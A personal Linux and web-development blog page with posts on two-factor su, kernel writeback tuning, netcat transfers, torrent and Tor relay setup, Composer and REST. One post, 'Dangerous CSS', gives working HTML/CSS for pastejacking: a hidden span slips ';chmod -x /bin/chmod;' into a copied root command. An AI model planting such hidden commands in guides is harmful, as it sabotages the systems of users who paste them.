Cinan's world

GNU/Linux & free software, howtos, web development, scripts and other geek stuff

‘$ su -’ With Two-Step Authentication

TL;DR

Log in with the user’s password and a verification code obtained from the Google Authenticator mobile app.

Intro

I really like the two-step (or two-factor) authentication idea. I use it everywhere I can (Google accounts, Bitstamp, Facebook…), so I got this idea: logging in as root should require the correct user password plus a verification code obtained from my phone. I found a very easy-to-use solution: Google Authenticator.
It’s an open-source project (Apache License 2.0), so if you’re paranoid go and check that it doesn’t contain some backdoor ;) The Authenticator app provides a random one-time password (verification code) users must enter in addition to their password.

I access my server via password-less SSH login (ssh alterego@my.server) and then log in as root (su -). I set up Google Authenticator to ask for a verification code after the correct root password is entered. Let’s do that right now.

Installation and usage

Install the PAM module and tools: libpam-google-authenticator. Log in as root and run google-authenticator. It generates a secret key and emergency scratch codes (useful if you lose your phone). On your phone, enter the generated secret key (the key type is ‘time based’).

Then append this line to /etc/pam.d/su:

auth required pam_google_authenticator.so
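For context, the resulting /etc/pam.d/su might look roughly like this – the exact stack varies by distribution, and only the last line is the addition:

```
# /etc/pam.d/su (sketch; distribution defaults vary)
auth    sufficient  pam_rootok.so
auth    required    pam_unix.so
auth    required    pam_google_authenticator.so
```

With pam_rootok.so first, root itself can still su without a code; everyone else needs both password and verification code.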

Now everything should be set up.

  1. You’re logged in as a regular user
  2. Fire su -
  3. Enter your password
  4. Enter verification code from your phone
  5. ???
  6. Profit.

Fix System Freezing While Copying to a Flash Drive

I copied about 10 GiB data from my hard drive to a USB3.0 flash drive. Much to my surprise the system started freezing, songs playback became interrupted, etc. Eventually I had to wait until the copying process finished.

Well, something like that is simply unacceptable if you have 8-core i7 processor, 8 GiB RAM and SSD.

So I found a simple solution. The problem was a bad default for dirty page writeback (kept for historical reasons). It’s a well-known Linux kernel problem.

What I did was:

echo 0 > /proc/sys/vm/dirty_background_ratio
echo 33554432 > /proc/sys/vm/dirty_background_bytes
echo 66554432 > /proc/sys/vm/dirty_bytes
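For orientation, those values are byte counts: 33554432 is exactly 32 MiB, and the third value caps total dirty memory at roughly double that. A tiny helper makes the conversion explicit:

```shell
# Convert MiB to bytes to sanity-check the thresholds above
mib_to_bytes() { echo $(( $1 * 1024 * 1024 )); }
mib_to_bytes 32   # 33554432 -- the dirty_background_bytes value above
```

Note that writing to dirty_background_bytes automatically disables dirty_background_ratio (and vice versa); the kernel only honors one of the pair at a time.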

After applying these changes the CPU load dropped from 6 to 3 and the system was fast and responsive again. To make the changes persistent, add the lines below to /etc/tmpfiles.d/dirty.conf:

w /proc/sys/vm/dirty_background_ratio - - - - 0
w /proc/sys/vm/dirty_background_bytes - - - - 33554432
w /proc/sys/vm/dirty_bytes - - - - 66554432

Maybe it’s already fixed in current kernels, I don’t know. I’m running openSUSE 13.1 with the 3.11.10-7-desktop kernel.

Unix Beauty – Copy & Paste Between Machines

Redirecting standard output to a file is well-known and easy. Almost as easily, output can be redirected from one machine to another. Say hello to the nc utility.

nc is part of the netcat package, which comes in two flavors in most Linux distributions: nc-traditional and nc-openbsd. In the examples below I use the traditional one.

On the first machine start listening on some port:

$ nc -lp 12345 > ~/file_received

Then, on another machine run something like this:

$ nc <hostname> 12345 < send_file

That’s all. The first machine listens on port 12345 and the other machine sends a stream of data to that port. The communication isn’t encrypted, so for sensitive data use scp instead.
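The same pipeline pattern composes with other tools. A local sketch (paths are examples): tar serializes a directory into a stream, and whatever carries the stream – a plain pipe here, nc or ssh between machines – is interchangeable. Substituting ssh for nc is exactly what buys you encryption.

```shell
# Pack a directory into a stream and unpack it elsewhere.
# Between machines the middle pipe would be e.g.: | ssh user@host 'tar xz -C dest'
mkdir -p /tmp/nc_demo/src /tmp/nc_demo/dst
echo "hello" > /tmp/nc_demo/src/file.txt
tar -C /tmp/nc_demo/src -cz . | tar -C /tmp/nc_demo/dst -xz
cat /tmp/nc_demo/dst/file.txt   # hello
```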

Dangerous CSS: How to Unnoticeably Destroy *nix System

Let’s do bad things. I’ve got an idea – provide a nice looking Linux command on a blog/wiki. Yep, that’s almost all.

Imagine you’re setting up dm-crypt encryption. You’ll find a guide with commands ready to copy & paste into your terminal. Almost all commands have to be run as root, that’s good for me. Something like this:

cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash sha512 --iter-time 5000 --use-urandom --verify-passphrase luksFormat <device>

Oh, almighty CSS, now it’s your turn. Go to this page and copy the command. I added some JavaScript to make selecting the text easier – JavaScript isn’t required, though. Now paste the copied text somewhere. As you can see, there’s a bonus command (chmod -x /bin/chmod). Nice, isn’t it?

Code, obviously:

<html>
<head>
  <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
  <script src="http://code.jquery.com/jquery-migrate-1.2.1.js"></script>
  <script>
      // Makes selecting text easier
      jQuery.fn.selText = function() {
          var obj = this[0];
          if (jQuery.browser.msie) {
              var range = obj.offsetParent.createTextRange();
              range.moveToElementText(obj);
              range.select();
          } else if (jQuery.browser.mozilla || jQuery.browser.opera) {
              var selection = obj.ownerDocument.defaultView.getSelection();
              var range = obj.ownerDocument.createRange();
              range.selectNodeContents(obj);
              selection.removeAllRanges();
              selection.addRange(range);
          } else if (jQuery.browser.webkit) {
              var selection = obj.ownerDocument.defaultView.getSelection();
              selection.setBaseAndExtent(obj, 0, obj, obj.innerText.length - 1);
          }
          return this;
      }
      
      $(document).ready(function() {
          $('pre').click(function(e) {
              e.preventDefault();
              $(this).selText();
          })
      });
  </script>
  <style>
      *::selection {
          background: rgb(95, 196, 243);
      }
      
      /* INTERESTING PART */
      span {
          width: 1px; /* can't be 0px */
          white-space: nowrap;
          display: inline-block;
          overflow: hidden; /* text hiding */
          color: transparent; /* text hiding */
          vertical-align: middle;
          position: absolute;
      }
      
      pre {
          display: inline-block;
          white-space: nowrap;
          overflow: hidden;
          border: 1px solid #bcd;
          background-color: #ebf1f5;
          color: #222;
          font-family: monospace;
          line-height: 1.1em;
          padding: 1em;
      }
      
      pre:first-of-type {
          border-right: 0;
          padding-right: 0;
      }
      
      pre:last-of-type {
          border-left: 0;
          padding-left: 2ex;
      }
  </style>
</head>
<body>
  <pre>#</pre><pre>cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash
      sha512 --iter-time 500<span>;chmod -x /bin/chmod; </span>0 --use-urandom --verify-passphrase luksFormat &lt;device&gt;
  </pre>
</body>
</html>

What’s happening here: clicking selects the pre content, which also contains a hidden span element, so the invisible command is copied along with the visible one. Tested in Chromium, Firefox, Opera and Safari.

Download Torrents on Your Server

tl;dr

  • How to setup Transmission web client on your Linux server
  • Firewall setup
  • Email notifications setup

Why am I doing this?

Recently I needed to download some stuff from torrentz. I have a quite unstable and slow internet connection at home, so I decided to download the stuff to my server and later transfer it to my laptop via rsync (with transfer resume and high compression enabled).

Choose a torrent client

There are many torrent clients suitable for headless Linux server (so they don’t need X.Org server and allow remote access). I’ve picked out Transmission. It looks easy to configure & use, supports magnet links, is lightweight, has web interface and is actively developed.

Install & configure

If your Linux distribution provides a split Transmission package, you need just transmission-cli or transmission-daemon (simply ignore the GTK and Qt packages).

After installation, edit the Transmission daemon configuration file (it may be located at /var/lib/transmission/.config/transmission-daemon/settings.json or at /etc/transmission-daemon/settings.json).

The interesting options you’ll probably want to edit are these:

  • encryption: 2 (Require encrypted connections)
  • rpc-enabled: true (Required for Transmission web client)
  • rpc-password: “” (Put some password, after transmission-daemon restart it will be hashed)
  • rpc-port: 9091
  • rpc-whitelist-enabled: false (if you have a dynamic public IP address you’ll want to disable this option)
  • umask: 0 (Give access to downloaded files to everybody – files have read & write permissions for owner, group and others)
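Put together, the relevant part of settings.json might look like this (the values are the examples from the list above; the real file contains many more keys, and rpc-password gets hashed on daemon restart):

```json
{
    "encryption": 2,
    "rpc-enabled": true,
    "rpc-password": "changeme",
    "rpc-port": 9091,
    "rpc-whitelist-enabled": false,
    "umask": 0
}
```

Remember to stop the daemon before editing, or it will overwrite your changes on shutdown.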

If you’re selfish and want to disable seeding right after a torrent download completes, set ratio-limit to 0 and ratio-limit-enabled to true.

Try web interface

You don’t need an HTTP server like Apache or Nginx; just go to http://your_domain:9091. Enter the username (empty by default) and password. That’s all.

Open ports in your firewall

Find the peer-port option in the Transmission config. Open this port in /etc/iptables/iptables.rules:

-A INPUT -p tcp -m tcp --dport 51413 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 51413 -j ACCEPT
-A OUTPUT -p udp -m udp --dport 80:60000 -j ACCEPT

Port 51413 has to be open, otherwise Transmission cannot download or upload data. I’ve also opened a range of UDP ports because of magnet links (DHT).

Hey! Downloading is finished!

The Transmission daemon can run a script after a download completes. I set script-torrent-done-enabled to true and put the full path to the script into the script-torrent-done-filename option.

Here’s my script:

#!/usr/bin/env bash
# $TR_TORRENT_NAME is set by transmission-daemon before it calls this script
echo "'$TR_TORRENT_NAME' is finished!" | gnu-mail -a "From: cinan.remote@gmail.com" -s "Torrent download finished" cinan6@gmail.com

Dependency Management in PHP Projects #2

In the last article about dependency management I explained why we PHP programmers need Composer and why you should use it in your PHP projects.

Let’s dig deeper into Composer internals.

Where can I find packages for composer?

Many of the packages we can use as project dependencies can be found on Packagist.

Dependency versioning

Let’s say our project depends on Twig library. The require section in composer.json file will look like this:

 "require": {
        "twig/twig": "1.12.*"
    }

The file says we want a Twig version from the 1.12 line. Composer will install the newest patch release of 1.12 (e.g. 1.12.1 or 1.12.3) – we’ll never get Twig 1.11, Twig 1.13 or Twig 2.0.

We can define an exact version of Twig like this: "twig/twig": "1.12.1".

Maybe we want the newest development version. It’s simple: "twig/twig": "dev-master". Now Composer will install the bleeding-edge version from the master branch of Twig’s Git repository. The schema is dev-<branch>.
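To summarize, the three constraint styles can sit side by side in one require section – the package names other than twig/twig are made up for illustration:

```json
"require": {
    "twig/twig": "1.12.*",
    "acme/exact-lib": "1.12.1",
    "acme/edge-lib": "dev-master"
}
```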

Using custom dependencies

If you have your own libraries you want to use in a project, add a repositories section to composer.json. It contains an array of VCS repositories.

Let’s say you want to use a library hosted on GitHub. Then the repositories section can look like this:

 "repositories": [
      {
          "type": "git",
          "url": "https://github.com/vendor/example.git"
      }
  ]

The type field says it’s a Git repository, and the address of the repository is defined in the url field.

Then, you can edit the require section:

 "require": {
      "twig/twig": "1.12.*",
      "vendor/example": "dev-master"
  }

Now composer update will fetch the code of the “example” library from the https://github.com/vendor/example.git repository.

How does my project know about installed dependencies?

Composer creates an autoload.php file in the vendor directory. The file takes care of dynamic autoloading of all dependencies. Dynamic means required files are loaded only when they are needed – if we had defined 20 dependencies, loading all their files up front would be very inefficient and slow.

When a dependency class is used for the first time, Composer’s autoloader gets called and tries to find and load the needed files.

I believe the example below illustrates this. All you need to do is include the autoload.php file in your project.

index.php
  <?php
  
  // load autoload.php
  require 'vendor/autoload.php';
  
  // how many files have been loaded so far
  echo "Number of loaded files: " . count(get_included_files()) . "\n";

  // now we can use a Twig class
  $loader = new Twig_Loader_String();
  
  echo "Number of loaded files: " . count(get_included_files()) . "\n";

The example is very simple; I just wanted to show that dependency autoloading just works. By the way, the output is:

Number of loaded files: 6
Number of loaded files: 9

The first time the counter ran, only Composer’s own files had been loaded. By the second count, Composer had loaded the additional files required by Twig.

A very interesting topic – autoloading your own code – is explained in the official Composer guide.

This article was also published on my school blog.

Join the Deep Web as a Tor Relay

As a long-term fan and occasional user of the Tor network I’ve decided to run a Tor middle relay. It’s a way of giving back to the Tor community. Other ways to help the Tor network are running an exit node or a bridge. The requirements are a server running a relatively secure operating system (*BSD or GNU/Linux would be my choice. No offense.) and bandwidth of at least 20 KiB/s up & down.

Installation is quite easy: just install the tor package from your repositories, or compile Tor from source.

Now edit your torrc file (located at /etc/tor/torrc or /etc/torrc). By default Tor may act as an Exit relay, which can be risky (depending on your country’s laws). If you don’t want to deal with abuse issues (when someone is doing some illegal shit via your relay), make sure your ExitPolicy refuses exits – this line must be present and uncommented:

ExitPolicy reject *:*

Now you’ll be acting as a “middleman”. If you do want to run an Exit relay, be sure to read the tutorials and the many tips about Exit relays first.

Next, set a speed limit for relay traffic. Change the RelayBandwidthRate and RelayBandwidthBurst lines as you need.

You can choose a name for your relay on the Nickname line.

Finally, open a port (the default 9001 is OK) in your firewall (ORPort line).
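Put together, the relevant torrc lines might look like this – the nickname and bandwidth values are only examples:

```
Nickname myrelay
ORPort 9001
RelayBandwidthRate 100 KBytes
RelayBandwidthBurst 200 KBytes
ExitPolicy reject *:*
```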

Now you can start the Tor daemon. Check your Tor logs; after a while you’ll see a line

Now checking whether ORPort <your-ip>:<your-port> is reachable...

and after that (if you configured Tor correctly) this will appear:

Self-testing indicates your ORPort is reachable from the outside. Excellent. Publishing server descriptor.

You can find a list of Tor relays here or here.

Dependency Management in PHP Projects #1

Programmers use many 3rd-party libraries in their projects. Problems occur when programmers developing a project don’t have the same libraries, or the same versions of those libraries. Dependency managers solve this problem in an elegant way. If you don’t know about them, I’m sure you’ll love them.

Introduction to Composer

Composer is a multi-platform and easy-to-use dependency manager for PHP. It works on Windows, GNU/Linux, BSD, OS X, whatever. You need PHP 5.3.2+.

Installation is pretty easy, here’s the official howto.

First, go to the project’s root directory and define the project dependencies in a composer.json file (right, it’s a file written in JSON :) ).

Here’s a real-world example from Gitlist project (licensed under New BSD license):

composer.json
{
    "require": {
        "silex/silex": "1.0.*@dev",
        "twig/twig": "1.12.*",
        "symfony/twig-bridge": "2.2.*",
        "symfony/filesystem": "2.2.*",
        "klaussilveira/gitter": "dev-master"
    },
    "require-dev": {
        "symfony/browser-kit": "2.2.*",
        "symfony/css-selector": "2.2.*",
        "phpunit/phpunit": "3.7.*",
        "phpmd/phpmd": "1.4.*",
        "phploc/phploc": "1.7.*"
    },
    "minimum-stability": "dev",
    "autoload": {
        "psr-0": {
            "GitList": "src/"
        }
    }
}

The file defines which dependencies the project requires (in the require object); dependencies for the development environment are listed in the require-dev object.

Now we can run composer install. When the task finishes, all dependencies are installed in the vendor directory and we can use them in the project.

Same versions everywhere

The install process created a composer.lock file. It stores a list of the installed dependencies along with their exact versions. This is necessary for keeping the same versions of dependencies across all computers where the project is deployed. If you’re interested in what the file looks like, check this out.

For example, take two programmers (Programmer#1 and Programmer#2). Both of them have installed the dependencies from the composer.json above. Then Programmer#1 wants to upgrade Twig from 1.12 to 1.13 because of new features he desperately needs. So he edits composer.json, runs composer update so the dependencies get updated, and commits the changes to the VCS they use (Git, SVN, …). What does he actually commit? Only composer.json and composer.lock. Those files contain everything others need to keep their systems up-to-date. (Actually, just the lock file is needed, but Programmer#1 knows Programmer#2 may want to change the dependencies in the future, so he commits composer.json too.)

Never commit vendor directory.

The next day Programmer#2 pulls the changes from the VCS and sees the Composer files were changed. So he fires up composer install, and after a few seconds he has exactly the same versions of the dependencies as Programmer#1 (install reads the lock file). It was so easy – just one command.

Summary of what we know so far

  1. First, create a composer.json file in the root directory of a project.
  2. Define project dependencies.
  3. Run composer install.
  4. Commit changes to VCS of your choice. Don’t forget you never commit vendor directory.

If you later change the dependencies, edit and save the JSON file, run composer update, and commit the json and lock files.

Maybe you’re asking: what’s the difference between the install and update commands? It’s simple.

  • The update command reads the composer.json file, installs the dependencies defined in it, and in the end creates/rewrites the lock file.
  • The install command installs dependencies from the lock file. If no lock file exists, it behaves like the update command.

In the second part of this article I’ll explain dependency versioning and reveal how the installed dependencies are integrated into projects.

This article was also published on my school blog.

Make Your Website Semantic With Microdata

Semantic web is getting more and more important. It’s not just another buzzword. The semantic web allows data to be shared and reused across application, enterprise, and community boundaries [1]. One of its benefits is that web pages with a clear semantic structure are more understandable to search engines.

If a website is to be semantic, its source code (HTML) has to be semantic. HTML5 semantic elements aren’t good enough because they are too general, so let’s extend HTML5. We have a few choices here – RDFa and several microformats.

One of them is Microdata. Microdata is essentially a set of HTML attributes used to describe the meaning of web page content. I’ll illustrate how simply it can be used.

Why did I choose Microdata? I think it has a simpler syntax than RDFa, and because of schema.org (I’ll explain later in the article).

Example of turning non-semantic HTML into semantic HTML

Example of a curriculum vitae header

With Microdata attributes
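The original example didn’t survive here, so below is a minimal illustrative reconstruction of the idea: a plain CV header, then the same markup annotated with Microdata attributes using the schema.org Person vocabulary (the name and employer are made up):

```html
<!-- Before: no machine-readable meaning -->
<header>
  <h1>John Doe</h1>
  <p>Web developer at Example Corp.</p>
</header>

<!-- After: the same header annotated with Microdata -->
<header itemscope itemtype="https://schema.org/Person">
  <h1 itemprop="name">John Doe</h1>
  <p><span itemprop="jobTitle">Web developer</span> at
     <span itemprop="worksFor" itemscope itemtype="https://schema.org/Organization">
       <span itemprop="name">Example Corp.</span>
     </span></p>
</header>
```

itemscope opens a new item, itemtype names its schema.org vocabulary, and itemprop attaches a property of that item to an element’s content.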

A Quick Look at REST

Three months ago I chose the REST architecture for a new project at work. The project goal is to create an API for managing gyms, trainings and trainees.

This article is just a light intro to the REST world; don’t expect cool tips & tricks (maybe in the next article).

HTTP request methods

REST without proper HTTP methods is nonsense. There are about 9 methods, but we need only 4.

  • POST – create a new resource
  • GET – get resource data
  • PUT – update a resource
  • DELETE – delete a resource

There is also the PATCH method, which is very similar to PUT. In fact, PUT should rewrite a whole resource while PATCH only updates some attributes of a resource. More about PUT vs PATCH here.
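Mapped onto the gym API, the methods might be used like this – the resource names and IDs are made up for illustration:

```
POST   /gyms        create a new gym
GET    /gyms/42     fetch gym 42
PUT    /gyms/42     replace gym 42 entirely
PATCH  /gyms/42     update selected attributes of gym 42
DELETE /gyms/42     delete gym 42
```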